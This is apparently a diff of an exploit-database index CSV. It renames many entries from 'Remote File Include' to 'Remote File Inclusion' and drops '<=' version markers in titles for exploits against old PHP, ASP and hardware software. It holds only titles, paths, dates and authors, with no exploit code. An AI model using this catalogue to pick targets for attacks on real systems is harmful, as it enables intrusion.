Dwianto",asp,webapps,0 -25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.php Remote File Include",2005-06-03,Status-x,php,webapps,0 +25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.php Remote File Inclusion",2005-06-03,Status-x,php,webapps,0 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",php,webapps,0 -25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Include",2005-06-03,"Leon Juranic",php,webapps,0 +25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection",2005-06-06,Romty,asp,webapps,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 -25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote and Local File Include Vulnerabilities",2005-06-06,anonymous,php,webapps,0 +25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Remote and Local File Inclusion Vulnerabilities",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x View.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0 25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x Upload.php Directory Traversal",2005-06-06,anonymous,php,webapps,0 25795,platforms/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 viewPrd.asp idcategory Parameter SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps,0 @@ -22959,7 +22959,7 @@ id,file,description,date,author,platform,type,port 25808,platforms/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps,0 25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (Mac OS X) - Crash PoC",2013-05-29,ariarat,osx,dos,0 25810,platforms/hardware/webapps/25810.py,"TP-LINK WR842ND - Remote Multiple SSID Directory Travesal Exploit",2013-05-29,"Adam Simuntis",hardware,webapps,0 -25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware <= 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 +25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,Metasploit,windows,remote,0 @@ -22984,7 +22984,7 @@ id,file,description,date,author,platform,type,port 25843,platforms/asp/webapps/25843.txt,"Ublog Reload 1.0.5 index.asp Multiple Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25844,platforms/asp/webapps/25844.txt,"Ublog Reload 1.0.5 blog_comment.asp y Parameter SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps,0 25845,platforms/asp/webapps/25845.txt,"Uapplication Ublog Reload 1.0.5 Trackback.ASP Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 -25846,platforms/php/webapps/25846.txt,"cPanel <= 9.1 User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 +25846,platforms/php/webapps/25846.txt,"cPanel 9.1 User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart LOGIN.ASP SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 @@ -22998,9 +22998,9 @@ id,file,description,date,author,platform,type,port 25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25856,platforms/php/webapps/25856.txt,"PAFaq Administrator Username SQL Injection",2005-06-20,"James Bercegay",php,webapps,0 -25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Include",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro Multiple SQL Injection Vulnerabilities",2005-06-22,"Dedi Dwianto",asp,webapps,0 -25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Include",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 +25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0 25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0 @@ -23083,8 +23083,8 @@ id,file,description,date,author,platform,type,port 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 Read.CGI Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 Index.php Cross-Site Scripting",2005-07-05,mozako,php,webapps,0 -25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.php3 - Remote File Include",2005-07-05,"SoulBlack Group",php,webapps,0 -25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Include",2005-07-06,"Stefan Esser",php,webapps,0 +25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.php3 - Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 +25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x User Command Buffer Overflow",2005-07-06,new.security@gmail.com,linux,dos,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.php Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0 @@ -23095,7 +23095,7 @@ id,file,description,date,author,platform,type,port 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution",2005-07-07,blahplok,cgi,webapps,0 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25954,platforms/php/webapps/25954.txt,"phpauction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 -25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Include",2005-07-07,"skdaemon porra",php,webapps,0 +25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x Profile.php User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0 @@ -23108,7 +23108,7 @@ id,file,description,date,author,platform,type,port 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 ShowErr.ASP Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 25966,platforms/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",hardware,remote,0 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0 -25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers <= fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 +25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - RCE Exploit",2013-06-05,eKKiM,linux,remote,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS (alertConfigField.php urlConfig param) - Remote/Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 @@ -23150,7 +23150,7 @@ id,file,description,date,author,platform,type,port 26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 Download.php SQL Injection",2005-08-21,krasza,php,webapps,0 26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 Password.php SQL Injection Vulnerabililty",2005-08-23,retrogod@aliceposta.it,php,webapps,0 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0 -26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Include",2005-08-23,rgod,php,webapps,0 +26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - CSRF",2013-06-07,"Pablo Ribeiro",php,webapps,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion",2013-06-07,Metasploit,windows,remote,80 @@ -23164,7 +23164,7 @@ id,file,description,date,author,platform,type,port 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 -26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.php Remote File Include",2005-07-25,lwdz,php,webapps,0 +26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 submit.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 nqgeoip2.php Multiple Parameter XSS",2005-07-25,rgod,php,webapps,0 @@ -23223,7 +23223,7 @@ id,file,description,date,author,platform,type,port 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 Index.php Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 -26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.php Remote File Include",2005-08-05,anonymous,php,webapps,0 +26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 Config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 WCE.Download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 dwt_editor.php Multiple Parameter XSS",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 jax_newsletter.php language Parameter XSS",2005-08-05,Lostmon,php,webapps,0 @@ -23335,7 +23335,7 @@ id,file,description,date,author,platform,type,port 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b user.php htmltext Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL-viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 Unauthorized Access",2005-08-23,rgod,php,webapps,0 -26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Include Vulnerabilities",2005-08-23,rgod,php,webapps,0 +26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusion Vulnerabilities",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 LSQ File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 @@ -23345,14 +23345,14 @@ id,file,description,date,author,platform,type,port 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 HTTP CONNECT Unauthorized Access Weakness",2005-08-25,"Oliver Karow",linux,remote,0 26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - Error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0 -26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 Api.php Remote File Include",2005-08-29,nf2@scheinwelt.at,php,webapps,0 +26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 Api.php Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 26202,platforms/php/webapps/26202.txt,"Looking Glass Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB Member.php SQL Injection",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 index.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro Al_initialize.php Remote File Include",2005-08-29,4Degrees,php,webapps,0 +26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 @@ -23361,7 +23361,7 @@ id,file,description,date,author,platform,type,port 26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow",2013-06-14,ariarat,windows,dos,0 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0 26216,platforms/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow",2005-08-31,ViPeR,windows,dos,0 -26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.php Remote File Include",2005-08-31,groszynskif,php,webapps,0 +26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.php Remote File Inclusion",2005-08-31,groszynskif,php,webapps,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service",2005-09-02,"Critical Security",windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 @@ -23381,7 +23381,7 @@ id,file,description,date,author,platform,type,port 26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 -26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Include",2005-09-08,"NewAngels Team",php,webapps,0 +26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 26240,platforms/php/webapps/26240.txt,"Ultimate WordPress Auction Plugin 1.0 - CSRF",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - (.wax) SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 @@ -23478,7 +23478,7 @@ id,file,description,date,author,platform,type,port 26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x Search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0 26351,platforms/asp/webapps/26351.txt,"Comersus BackOffice Plus Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0 -26353,platforms/linux/local/26353.txt,"Linux Kernel <= 2.6 - Console Keymap Local Command Injection PoC",2005-10-17,"Rudolf Polzer",linux,local,0 +26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection PoC",2005-10-17,"Rudolf Polzer",linux,local,0 26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0 26355,platforms/php/webapps/26355.txt,"MySource 2.14 upgrade_in_progress_backend.php target_url Parameter XSS",2005-10-18,"Secunia Research",php,webapps,0 26356,platforms/php/webapps/26356.txt,"MySource 2.14 insert_table.php bgcolor Parameter XSS",2005-10-18,"Secunia Research",php,webapps,0 @@ -23509,7 +23509,7 @@ id,file,description,date,author,platform,type,port 26381,platforms/php/webapps/26381.txt,"Chipmunk Directory recommend.php entryID Parameter XSS",2005-10-20,"Alireza Hassani",php,webapps,0 26382,platforms/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",linux,dos,0 26383,platforms/php/webapps/26383.txt,"Zomplog 3.3/3.4 Detail.php HTML Injection",2005-10-22,sikikmail,php,webapps,0 -26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.php Multiple Remote File Include Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 +26384,platforms/php/webapps/26384.txt,"FlatNuke 2.5.x Index.php Multiple Remote File Inclusion Vulnerabilities",2005-10-22,abducter_minds@yahoo.com,php,webapps,0 26385,platforms/php/webapps/26385.txt,"FlatNuke 2.5.x Index.php Cross-Site Scripting",2005-10-26,alex@aleksanet.com,php,webapps,0 26388,platforms/php/webapps/26388.txt,"Nuked-Klan 1.7 Download Module dl_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26389,platforms/php/webapps/26389.pl,"Nuked-Klan 1.7 Links Module link_id Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 @@ -23520,9 +23520,9 @@ id,file,description,date,author,platform,type,port 26394,platforms/php/webapps/26394.txt,"MWChat 6.8 Chat.php SQL Injection",2005-05-21,rgod,php,webapps,0 26395,platforms/php/webapps/26395.txt,"Basic Analysis And Security Engine 1.2 Base_qry_main.php SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 Usercp.php SQL Injection",2005-10-26,Animal,php,webapps,0 -26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 GameID Parameter Remote SQL Injection",2005-10-26,almaster,php,webapps,0 +26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 GameID Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps,0 -26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Include",2005-10-26,X,php,webapps,0 +26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 @@ -23600,7 +23600,7 @@ id,file,description,date,author,platform,type,port 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0 26474,platforms/php/webapps/26474.txt,"PHPFM Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 -26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Include",2005-11-07,khc@bsdmail.org,php,webapps,0 +26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 26477,platforms/php/webapps/26477.txt,"XMB 1.9.3 U2U.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 admin.php Multiple Parameter XSS",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 Advance Program Control Bypass Weakness",2005-11-07,Tr0y-x,windows,local,0 @@ -23626,7 +23626,7 @@ id,file,description,date,author,platform,type,port 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 Download.php File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 Admin Control Panel Username SQL Injection",2005-11-12,bhs_team,php,webapps,0 -26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 Module.php Local File Include",2005-11-14,"HACKERS PAL",php,webapps,0 +26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 Module.php Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum ForumReply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 @@ -23635,11 +23635,11 @@ id,file,description,date,author,platform,type,port 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 ts.exe sug Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 Index.php Multiple SQL Injection Vulnerabilities",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 -26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 Index.php Local File Include",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 +26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 Index.php Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26512,platforms/php/webapps/26512.txt,"phpwcms 1.2.5 -DEV - login.php form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"phpwcms 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0 -26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Include",2005-11-15,"Robin Verton",php,webapps,0 +26515,platforms/php/webapps/26515.txt,"AlstraSoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 Profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0 26517,platforms/windows/dos/26517.txt,"Microsoft Office PowerPoint 2007 - Crash PoC",2013-07-01,Asesino04,windows,dos,0 26829,platforms/php/webapps/26829.txt,"QuickPayPro 3.1 - subscribers.tracking.edit.php subtrackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 @@ -23722,9 +23722,9 @@ id,file,description,date,author,platform,type,port 26595,platforms/php/webapps/26595.txt,"IsolSoft Support Center 2.2 - Multiple SQL Injection Vulnerabilities",2005-11-25,r0t3d3Vil,php,webapps,0 26596,platforms/php/webapps/26596.txt,"AgileBill 1.4.92 Product_Cat SQL Injection",2005-11-25,r0t,php,webapps,0 26597,platforms/php/webapps/26597.txt,"PBLang Bulletin Board System 4.65 - Multiple HTML Injection Vulnerabilities",2005-11-26,r0xes,php,webapps,0 -26598,platforms/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Include",2005-11-26,[GB],php,webapps,0 -26599,platforms/php/webapps/26599.txt,"PHPGreetz 0.99 - Remote File Include",2005-11-26,[GB],php,webapps,0 -26600,platforms/php/webapps/26600.txt,"Q-News 2.0 - Remote File Include",2005-11-26,[GB],php,webapps,0 +26598,platforms/php/webapps/26598.txt,"Athena PHP Website Administration 0.1 - Remote File Inclusion",2005-11-26,[GB],php,webapps,0 